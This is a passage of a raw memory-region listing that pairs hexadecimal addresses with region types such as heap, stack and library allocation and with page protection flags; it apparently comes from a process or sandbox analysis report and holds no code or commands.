stack
page read and write
9A4000
unkown
page read and write
86B000
heap
page read and write
53C0000
unkown
page read and write
9A4000
unkown
page read and write
2916000
trusted library allocation
page read and write
22CAE710000
heap
page read and write
B3E000
unkown
page read and write
53C1000
unkown
page read and write
1430000
heap
page read and write
22CB1CEC000
trusted library allocation
page read and write
11B5000
heap
page read and write
22CB14D9000
trusted library allocation
page read and write
7FFC3D7C2000
trusted library allocation
page read and write
2969000
trusted library allocation
page read and write
22CC85A0000
heap
page execute and read and write
22CB2107000
trusted library allocation
page read and write
5FC0000
trusted library allocation
page execute and read and write
854000
heap
page read and write
7FFC3D7C0000
trusted library allocation
page read and write
5D20000
trusted library allocation
page execute and read and write
7FF7013C1000
unkown
page execute read
22CC8A6A000
heap
page read and write
5DB9B3E000
stack
page read and write
2610000
heap
page read and write
3240000
unkown
page read and write
9A4000
unkown
page read and write
5AC5000
trusted library allocation
page read and write
22CAE65F000
heap
page read and write
9A4000
unkown
page read and write
145F000
heap
page read and write
5CF0000
trusted library allocation
page execute and read and write
54D0000
trusted library allocation
page read and write
8E1000
unkown
page execute read
9A4000
unkown
page read and write
3250000
unkown
page read and write
8E0000
unkown
page readonly
5010000
direct allocation
page read and write
22CC8951000
heap
page read and write
9A4000
unkown
page read and write
22CB228E000
trusted library allocation
page read and write
5DE5000
heap
page read and write
22CB166F000
trusted library allocation
page read and write
77B000
heap
page read and write
BB4000
unkown
page read and write
5484000
trusted library allocation
page read and write
9C000
stack
page read and write
255CBDCC000
heap
page read and write
6F8000
stack
page read and write
24BB000
trusted library allocation
page execute and read and write
9A4000
unkown
page read and write
A4E000
stack
page read and write
22CB1D2E000
trusted library allocation
page read and write
D7A000
unkown
page read and write
55B0000
heap
page read and write
22CAE7C0000
trusted library allocation
page read and write
22CAE7A0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
3119000
trusted library allocation
page read and write
2967000
trusted library allocation
page read and write
4C26000
trusted library allocation
page read and write
A60000
heap
page read and write
575E000
stack
page read and write
22CB20F3000
trusted library allocation
page read and write
599E000
stack
page read and write
7FFC3DAD0000
trusted library allocation
page read and write
22CB050C000
trusted library allocation
page read and write
22CB0E78000
trusted library allocation
page read and write
5D00000
trusted library allocation
page read and write
5DB957E000
stack
page read and write
22CC8A0C000
heap
page read and write
22CB10FB000
trusted library allocation
page read and write
22CAE61D000
heap
page read and write
8E0000
unkown
page readonly
2972000
trusted library allocation
page read and write
22CB189B000
trusted library allocation
page read and write
D0E000
stack
page read and write
5DBA84B000
stack
page read and write
D39000
heap
page read and write
2EE0000
unkown
page read and write
22CB085C000
trusted library allocation
page read and write
22CB21C0000
trusted library allocation
page read and write
22CB1120000
trusted library allocation
page read and write
5790000
unkown
page read and write
1181000
heap
page read and write
2BF4000
trusted library allocation
page read and write
28AF000
trusted library allocation
page read and write
12A6000
heap
page read and write
7FFC3DAA0000
trusted library allocation
page read and write
2CA2000
trusted library allocation
page read and write
5E0D000
heap
page read and write
165E000
stack
page read and write
51DE000
stack
page read and write
56A1000
unkown
page read and write
7FFC3D7D0000
trusted library allocation
page read and write
5DA2000
heap
page read and write
1428000
heap
page read and write
52DE000
stack
page read and write
22CB1E26000
trusted library allocation
page read and write
582E000
stack
page read and write
22CB189E000
trusted library allocation
page read and write
9A0D000
heap
page read and write
B07000
heap
page read and write
AE6000
trusted library allocation
page execute and read and write
513D000
direct allocation
page read and write
9A4000
unkown
page read and write
2872000
trusted library allocation
page read and write
6E6A000
stack
page read and write
22CB19F7000
trusted library allocation
page read and write
22CAE8B5000
heap
page read and write
2A62000
heap
page read and write
5DB96FE000
stack
page read and write
7FF7013F5000
unkown
page write copy
990000
heap
page read and write
22CC86F7000
heap
page read and write
A512000
unkown
page read and write
4C40000
heap
page execute and read and write
27EE000
trusted library allocation
page read and write
1445000
heap
page read and write
4DB0000
trusted library allocation
page read and write
1400000
heap
page read and write
7FF7013F5000
unkown
page read and write
1410000
trusted library allocation
page execute and read and write
7FFC3DB20000
trusted library allocation
page read and write
A1B2000
unkown
page read and write
722E000
stack
page read and write
9A4000
unkown
page read and write
AC0000
trusted library allocation
page read and write
9A4000
unkown
page read and write
5CA0000
trusted library allocation
page read and write
25D2000
trusted library allocation
page read and write
BB4000
unkown
page read and write
5D9C000
heap
page read and write
557E000
stack
page read and write
9A4000
unkown
page read and write
22CB226A000
trusted library allocation
page read and write
9A4000
unkown
page read and write
22CB1D9B000
trusted library allocation
page read and write
22CB1770000
trusted library allocation
page read and write
22CB0907000
trusted library allocation
page read and write
592F000
stack
page read and write
9A4000
unkown
page read and write
283F000
trusted library allocation
page read and write
24B5000
trusted library allocation
page execute and read and write
5139000
direct allocation
page read and write
1170000
heap
page read and write
85F000
heap
page read and write
22CC88FB000
heap
page read and write
255CD670000
heap
page read and write
BB4000
unkown
page read and write
7E0000
heap
page read and write
A11E000
unkown
page read and write
AF0000
heap
page read and write
2AAA000
trusted library allocation
page read and write
53C1000
unkown
page read and write
9A4000
unkown
page read and write
7FFC3DB70000
trusted library allocation
page read and write
9A4000
unkown
page read and write
9B0000
unkown
page readonly
8C3000
heap
page read and write
A2A0000
unkown
page read and write
22CB21A2000
trusted library allocation
page read and write
28B5000
trusted library allocation
page read and write
22CB21BA000
trusted library allocation
page read and write
5ADE000
stack
page read and write
9A4000
unkown
page read and write
663E000
stack
page read and write
22CC0497000
trusted library allocation
page read and write
2ADA000
trusted library allocation
page read and write
1500000
unkown
page read and write
2A20000
trusted library allocation
page read and write
7FFC3DC40000
trusted library allocation
page read and write
9D0000
unkown
page readonly
B7E000
unkown
page read and write
9A4000
unkown
page read and write
2E75000
heap
page read and write
56A0000
unkown
page read and write
28DE000
trusted library allocation
page read and write
677B000
stack
page read and write
24B7000
trusted library allocation
page execute and read and write
C3F000
stack
page read and write
8BB000
heap
page read and write
7FFC3DB54000
trusted library allocation
page read and write
BC0000
direct allocation
page read and write
297D000
trusted library allocation
page read and write
9A5000
unkown
page read and write
5B2D000
stack
page read and write
854000
heap
page read and write
9A4000
unkown
page read and write
4E15000
heap
page read and write
22CB090B000
trusted library allocation
page read and write
A4CA000
unkown
page read and write
22CB08C8000
trusted library allocation
page read and write
AE0000
trusted library allocation
page read and write
7FFC3D8A6000
trusted library allocation
page execute and read and write
2AC3000
trusted library allocation
page read and write
A9C000
heap
page read and write
D86000
unkown
page read and write
7FFC3D9D0000
trusted library allocation
page read and write
1F0DEEFD000
heap
page read and write
C0C000
stack
page read and write
B4F000
stack
page read and write
6E0000
heap
page read and write
7FFC3DA10000
trusted library allocation
page read and write
6CF0000
heap
page read and write
7FFC3D990000
trusted library allocation
page execute and read and write
C9B000
stack
page read and write
9A4000
unkown
page read and write
22CC88C8000
heap
page read and write
7FFC3D9C0000
trusted library allocation
page read and write
541D000
direct allocation
page read and write
8AD000
heap
page read and write
736D000
stack
page read and write
7D0000
unkown
page readonly
1280000
trusted library allocation
page read and write
5DB9ABE000
stack
page read and write
7F4000
heap
page read and write
27CA000
trusted library allocation
page read and write
7FF7013E0000
unkown
page readonly
C4F000
unkown
page execute read
7FFC3DB60000
trusted library allocation
page read and write
DB4000
unkown
page readonly
7FFC3D870000
trusted library allocation
page read and write
22CC076F000
trusted library allocation
page read and write
7FFC3D7E0000
trusted library allocation
page read and write
22CC077D000
trusted library allocation
page read and write
13DB000
trusted library allocation
page execute and read and write
22CAE655000
heap
page read and write
255CBDB0000
heap
page read and write
9B30000
heap
page read and write
22CB178E000
trusted library allocation
page read and write
22CC86F3000
heap
page read and write
A1F000
unkown
page readonly
2C34000
trusted library allocation
page read and write
AB0000
trusted library allocation
page read and write
7FFC3DAB0000
trusted library allocation
page read and write
255CD6A0000
direct allocation
page read and write
BB4000
unkown
page read and write
22CC8900000
heap
page read and write
2A0A000
trusted library allocation
page read and write
2600000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
75FE000
stack
page read and write
5ACA000
trusted library allocation
page read and write
BB4000
unkown
page read and write
2A2B000
trusted library allocation
page read and write
CA511FF000
stack
page read and write
3120000
heap
page execute and read and write
22CB1997000
trusted library allocation
page read and write
4D88000
trusted library allocation
page read and write
68C0000
heap
page read and write
2B44000
trusted library allocation
page read and write
22CC8935000
heap
page read and write
3825000
trusted library allocation
page read and write
4728000
trusted library allocation
page read and write
22CAE800000
trusted library allocation
page read and write
22CB06AB000
trusted library allocation
page read and write
1F0DEDC0000
heap
page read and write
5D70000
trusted library allocation
page execute and read and write
22CC8757000
heap
page read and write
54C9000
trusted library allocation
page read and write
9FFA000
unkown
page read and write
2859000
trusted library allocation
page read and write
9A4000
unkown
page read and write
163D000
unkown
page read and write
304B000
heap
page read and write
255CD696000
heap
page read and write
2B59000
trusted library allocation
page read and write
9EFE000
trusted library allocation
page read and write
27FE000
trusted library allocation
page read and write
C96000
unkown
page read and write
9748000
heap
page read and write
7FFC3D81C000
trusted library allocation
page execute and read and write
7F4000
heap
page read and write
5AA0000
trusted library allocation
page read and write
5C61000
trusted library allocation
page read and write
5AA5000
trusted library allocation
page read and write
2C56000
trusted library allocation
page read and write
22CC89B0000
heap
page read and write
C80000
unkown
page execute read
BB0000
heap
page read and write
7F0000
unkown
page read and write
AF7000
heap
page read and write
2580000
trusted library allocation
page read and write
5AA9000
trusted library allocation
page read and write
96A000
stack
page read and write
13C6000
heap
page read and write
255CD7A0000
direct allocation
page read and write
5AA2000
trusted library allocation
page read and write
3846000
trusted library allocation
page read and write
4C23000
trusted library allocation
page read and write
9A4000
unkown
page read and write
2ED0000
unkown
page read and write
2A4B000
trusted library allocation
page read and write
1286000
heap
page read and write
7FFC3DB59000
trusted library allocation
page read and write
1294000
trusted library allocation
page read and write
830000
heap
page read and write
5DBA60E000
stack
page read and write
7FFC3D7DB000
trusted library allocation
page read and write
7FFC3DBC0000
trusted library allocation
page execute and read and write
7F4000
heap
page read and write
51BE000
trusted library allocation
page read and write
22CAE7F7000
heap
page read and write
22CB1A52000
trusted library allocation
page read and write
9A4000
unkown
page read and write
5DB993C000
stack
page read and write
68A0000
trusted library section
page read and write
840000
heap
page read and write
82D000
stack
page read and write
22CAE500000
heap
page read and write
2919000
trusted library allocation
page read and write
5AB8000
trusted library allocation
page read and write
22CC8480000
heap
page read and write
7FF7013F8000
unkown
page readonly
4F38000
heap
page read and write
30F0000
heap
page read and write
A0F000
stack
page read and write
732D000
stack
page read and write
163D000
unkown
page read and write
7FFC3D97A000
trusted library allocation
page read and write
255CD690000
direct allocation
page read and write
22CB176D000
trusted library allocation
page read and write
53C1000
unkown
page read and write
280D000
trusted library allocation
page read and write
4E99000
trusted library allocation
page read and write
A6C000
heap
page read and write
22CC8698000
heap
page read and write
22CC87B0000
heap
page read and write
7FFC3DA60000
trusted library allocation
page read and write
65FE000
stack
page read and write
9A4000
unkown
page read and write
2864000
trusted library allocation
page read and write
77C000
stack
page read and write
22CC877A000
heap
page read and write
7FFC3DA20000
trusted library allocation
page read and write
22CB1892000
trusted library allocation
page read and write
2BE7000
trusted library allocation
page read and write
5DB967E000
stack
page read and write
D87000
unkown
page readonly
22CB18B6000
trusted library allocation
page read and write
9A4000
unkown
page read and write
25BE000
trusted library allocation
page read and write
4D7D000
stack
page read and write
22CB084E000
trusted library allocation
page read and write
C0D000
unkown
page execute read
22CB228B000
trusted library allocation
page read and write
22CB179D000
trusted library allocation
page read and write
C00000
direct allocation
page read and write
9A4000
unkown
page read and write
22CC04A9000
trusted library allocation
page read and write
1181000
heap
page read and write
22CB1BAF000
trusted library allocation
page read and write
53C1000
unkown
page read and write
5E1A000
heap
page read and write
D3B000
heap
page read and write
7FFC3DA80000
trusted library allocation
page read and write
2C8F000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
9C0000
unkown
page readonly
5DBA68E000
stack
page read and write
2C40000
trusted library allocation
page read and write
651000
unkown
page read and write
6D0000
heap
page read and write
5F7E000
stack
page read and write
4C60000
trusted library allocation
page execute and read and write
7FFC3DB30000
trusted library allocation
page read and write
255CBCB0000
heap
page read and write
1600000
unkown
page readonly
1293000
trusted library allocation
page execute and read and write
22CB2285000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
5DBA74F000
stack
page read and write
27FA000
trusted library allocation
page read and write
1000000
unkown
page readonly
124E000
stack
page read and write
22CC8A17000
heap
page read and write
255CD665000
heap
page read and write
22CB1999000
trusted library allocation
page read and write
763E000
stack
page read and write
22CC89C3000
heap
page read and write
7B0000
unkown
page readonly
9881000
heap
page read and write
9A4000
unkown
page read and write
D98000
stack
page read and write
400000
unkown
page readonly
7FFC3DB33000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
2B89000
trusted library allocation
page read and write
9C000
stack
page read and write
22CB1CB7000
trusted library allocation
page read and write
830000
heap
page read and write
9A4000
unkown
page read and write
657000
unkown
page readonly
650000
unkown
page read and write
9E0000
heap
page read and write
22CAE780000
trusted library allocation
page read and write
2B42000
trusted library allocation
page read and write
19C000
stack
page read and write
9A4000
unkown
page read and write
7FFC3DB68000
trusted library allocation
page read and write
9A4000
unkown
page read and write
2C82000
trusted library allocation
page read and write
52F0000
direct allocation
page read and write
2C9C000
trusted library allocation
page read and write
7FF7013C0000
unkown
page readonly
2721000
trusted library allocation
page read and write
554E000
unkown
page read and write
22CC89E2000
heap
page read and write
287A000
trusted library allocation
page read and write
98D7000
heap
page read and write
284B000
trusted library allocation
page read and write
7FFC3DA50000
trusted library allocation
page read and write
AFA000
stack
page read and write
A12000
unkown
page write copy
A33A000
unkown
page read and write
A75000
heap
page read and write
22CAE5E0000
heap
page read and write
22CB0B9F000
trusted library allocation
page read and write
3721000
trusted library allocation
page read and write
A2E000
unkown
page read and write
5DB91F3000
stack
page read and write
22CAE675000
heap
page read and write
14A6000
heap
page read and write
145D000
heap
page read and write
299C000
trusted library allocation
page read and write
4131000
trusted library allocation
page read and write
22CB0470000
heap
page execute and read and write
687D000
stack
page read and write
281E000
trusted library allocation
page read and write
7FFC3DA00000
trusted library allocation
page read and write
7580000
trusted library allocation
page read and write
848000
heap
page read and write
56A1000
unkown
page read and write
161F000
stack
page read and write
25A0000
trusted library allocation
page read and write
2A17000
trusted library allocation
page read and write
ACD000
trusted library allocation
page execute and read and write
7E0000
heap
page read and write
22CC8711000
heap
page read and write
255CBD90000
heap
page read and write
4C60000
heap
page read and write
22CC8680000
heap
page execute and read and write
7EE000
stack
page read and write
ED0000
heap
page read and write
1271000
heap
page read and write
7F0000
heap
page read and write
22CC8967000
heap
page read and write
5D80000
heap
page read and write
22CB1B8C000
trusted library allocation
page read and write
22CB1794000
trusted library allocation
page read and write
B00000
heap
page read and write
D89000
unkown
page readonly
2C5C000
trusted library allocation
page read and write
5A9B000
stack
page read and write
A1A0000
unkown
page read and write
9A4000
unkown
page read and write
22CC8C60000
heap
page read and write
9E89000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
7FFC3DB50000
trusted library allocation
page read and write
22CC8890000
heap
page read and write
7F4000
heap
page read and write
22CB1B41000
trusted library allocation
page read and write
22CB1791000
trusted library allocation
page read and write
22CC0499000
trusted library allocation
page read and write
28D6000
trusted library allocation
page read and write
7FFC3DC10000
trusted library allocation
page read and write
786E000
stack
page read and write
22CB21B1000
trusted library allocation
page read and write
22CC8690000
heap
page read and write
25F0000
heap
page read and write
4DA0000
trusted library allocation
page execute and read and write
7FFC3DB6C000
trusted library allocation
page read and write
9E8D000
trusted library allocation
page read and write
22CB1B1F000
trusted library allocation
page read and write
9D1000
unkown
page readonly
7F4000
heap
page read and write
7FFC3DB90000
trusted library allocation
page read and write
22CB110B000
trusted library allocation
page read and write
13D0000
trusted library allocation
page read and write
6E8000
heap
page read and write
25AE000
trusted library allocation
page read and write
22CB2270000
trusted library allocation
page read and write
1465000
heap
page read and write
9A4000
unkown
page read and write
6BEE000
stack
page read and write
585F000
stack
page read and write
DD0000
unkown
page readonly
C40000
unkown
page readonly
7FFC3DC30000
trusted library allocation
page execute and read and write
7FFC3DB10000
trusted library allocation
page read and write
2CA8000
trusted library allocation
page read and write
22CB1779000
trusted library allocation
page read and write
12A4000
trusted library allocation
page read and write
4D80000
trusted library allocation
page read and write
9A5000
heap
page read and write
5FBE000
stack
page read and write
673E000
stack
page read and write
22CAE7F5000
heap
page read and write
AEA000
trusted library allocation
page execute and read and write
10C0000
unkown
page readonly
22CC89FF000
heap
page read and write
22CC0782000
trusted library allocation
page read and write
2921000
trusted library allocation
page read and write
7FFC3DC00000
trusted library allocation
page read and write
63E000
unkown
page read and write
2C43000
trusted library allocation
page read and write
4C20000
trusted library allocation
page read and write
22CAE830000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
4C5B000
trusted library allocation
page read and write
5DB98B6000
stack
page read and write
2814000
trusted library allocation
page read and write
1636000
unkown
page readonly
4D90000
trusted library allocation
page read and write
854000
heap
page read and write
28A3000
trusted library allocation
page read and write
548E000
direct allocation
page read and write
28B2000
trusted library allocation
page read and write
AE2000
trusted library allocation
page read and write
22CB1027000
trusted library allocation
page read and write
5470000
trusted library allocation
page read and write
7FFC3DBB2000
trusted library allocation
page read and write
7FFC3D980000
trusted library allocation
page execute and read and write
6A1C000
stack
page read and write
568D000
stack
page read and write
7DF43AF80000
trusted library allocation
page execute and read and write
271E000
stack
page read and write
4EE1000
trusted library allocation
page read and write
22CC0784000
trusted library allocation
page read and write
9A0000
heap
page read and write
9A4000
unkown
page read and write
9A4000
unkown
page read and write
82E000
stack
page read and write
5ACF000
trusted library allocation
page read and write
C41000
unkown
page execute read
22CC89F1000
heap
page read and write
7FFC3D9B0000
trusted library allocation
page execute and read and write
22CC890F000
heap
page read and write
B65000
unkown
page execute read
25C6000
trusted library allocation
page read and write
75B0000
trusted library allocation
page execute and read and write
5DB97F8000
stack
page read and write
8B7000
heap
page read and write
5C2C000
stack
page read and write
5D90000
heap
page read and write
28A5000
trusted library allocation
page read and write
7FFC3D9F0000
trusted library allocation
page read and write
68D0000
trusted library allocation
page read and write
2C36000
trusted library allocation
page read and write
9A4000
unkown
page read and write
7FFC3DB80000
trusted library allocation
page read and write
145A000
heap
page read and write
7FFC3DBD0000
trusted library allocation
page read and write
5DB9BBB000
stack
page read and write
2C0A000
trusted library allocation
page read and write
1490000
heap
page read and write
22CB1666000
trusted library allocation
page read and write
284E000
trusted library allocation
page read and write
1200000
heap
page read and write
255CBDB8000
heap
page read and write
95E000
stack
page read and write
599E000
stack
page read and write
2942000
trusted library allocation
page read and write
311C000
trusted library allocation
page read and write
9A4000
unkown
page read and write
BB4000
unkown
page read and write
255CD7C0000
direct allocation
page read and write
292C000
trusted library allocation
page read and write
7DF43AF90000
trusted library allocation
page execute and read and write
2E60000
heap
page read and write
86C000
stack
page read and write
22CB21AE000
trusted library allocation
page read and write
4F0E000
stack
page read and write
ABD000
heap
page read and write
29FC000
trusted library allocation
page read and write
179D000
stack
page read and write
6D0000
heap
page read and write
2EF4000
unkown
page read and write
5DB95F9000
stack
page read and write
293A000
trusted library allocation
page read and write
2A15000
trusted library allocation
page read and write
6F69000
stack
page read and write
AC4000
trusted library allocation
page read and write
9B6000
heap
page read and write
3020000
direct allocation
page read and write
6A50000
trusted library allocation
page execute and read and write
5DB9C3B000
stack
page read and write
D30000
heap
page read and write
A40000
direct allocation
page read and write
25AB000
trusted library allocation
page read and write
8E1000
unkown
page execute read
DBE000
unkown
page readonly
9D1000
unkown
page readonly
13BE000
stack
page read and write
3254000
unkown
page read and write
2A9F000
trusted library allocation
page read and write
2BF7000
trusted library allocation
page read and write
53C1000
unkown
page read and write
2B7D000
trusted library allocation
page read and write
70ED000
stack
page read and write
12B0000
heap
page read and write
7FF7013FC000
unkown
page readonly
59DE000
stack
page read and write
9A4000
unkown
page read and write
128C000
heap
page read and write
53C1000
unkown
page read and write
2851000
trusted library allocation
page read and write
322F000
unkown
page read and write
2BEB000
trusted library allocation
page read and write
6FAE000
stack
page read and write
22CAE740000
heap
page read and write
7FFC3D971000
trusted library allocation
page read and write
29F1000
trusted library allocation
page read and write
24B2000
trusted library allocation
page read and write
22CAE628000
heap
page read and write
9A4000
unkown
page read and write
5A30000
unkown
page read and write
255CD660000
heap
page read and write
2E6C000
heap
page read and write
5DB983E000
stack
page read and write
2C8C000
trusted library allocation
page read and write
BB4000
unkown
page read and write
22CC8A45000
heap
page read and write
17A0000
heap
page read and write
7F4000
heap
page read and write
10D0000
heap
page read and write
3230000
unkown
page read and write
746E000
stack
page read and write
98E8000
heap
page read and write
578F000
stack
page read and write
25F3000
heap
page read and write
2B72000
trusted library allocation
page read and write
22CAE657000
heap
page read and write
22CB165A000
trusted library allocation
page read and write
7FFC3DAE0000
trusted library allocation
page read and write
29E5000
trusted library allocation
page read and write
DAC000
unkown
page readonly
7FFC3D7C3000
trusted library allocation
page execute and read and write
BB4000
unkown
page read and write
27D2000
trusted library allocation
page read and write
1601000
unkown
page execute read
9A4000
unkown
page read and write
22CC8973000
heap
page read and write
854000
heap
page read and write
175E000
stack
page read and write
53C1000
unkown
page read and write
5419000
direct allocation
page read and write
22CB21A8000
trusted library allocation
page read and write
1271000
heap
page read and write
97E000
stack
page read and write
3254000
unkown
page read and write
650000
unkown
page write copy
22CB18A7000
trusted library allocation
page read and write
11A1000
heap
page read and write
9A4000
unkown
page read and write
A2C0000
unkown
page read and write
53C1000
unkown
page read and write
ADD000
trusted library allocation
page execute and read and write
6E10000
trusted library allocation
page execute and read and write
22CC895B000
heap
page read and write
22CAE6BF000
heap
page read and write
D79000
unkown
page write copy
2560000
trusted library allocation
page execute and read and write
CA510FC000
stack
page read and write
30ED000
stack
page read and write
22CB2282000
trusted library allocation
page read and write
2AFA000
trusted library allocation
page read and write
22CAE890000
heap
page read and write
9765000
heap
page read and write
7F4000
heap
page read and write
71EC000
stack
page read and write
258C000
trusted library allocation
page read and write
7FF7013F8000
unkown
page readonly
1270000
heap
page read and write
AC3000
trusted library allocation
page execute and read and write
854000
heap
page read and write
9A4000
unkown
page read and write
FF6D0000
trusted library allocation
page execute and read and write
2B67000
trusted library allocation
page read and write
7FF7013E0000
unkown
page readonly
22CC8A37000
heap
page read and write
776E000
stack
page read and write
9A4000
unkown
page read and write
A30000
unkown
page read and write
9B0000
heap
page read and write
691C000
stack
page read and write
7FFC3D876000
trusted library allocation
page read and write
564E000
unkown
page read and write
2841000
trusted library allocation
page read and write
22CC04F4000
trusted library allocation
page read and write
5DBA70D000
stack
page read and write
73F000
heap
page read and write
4C80000
trusted library allocation
page read and write
6A20000
heap
page read and write
22CB0481000
trusted library allocation
page read and write
22CB24D0000
trusted library allocation
page read and write
7FF7013C0000
unkown
page readonly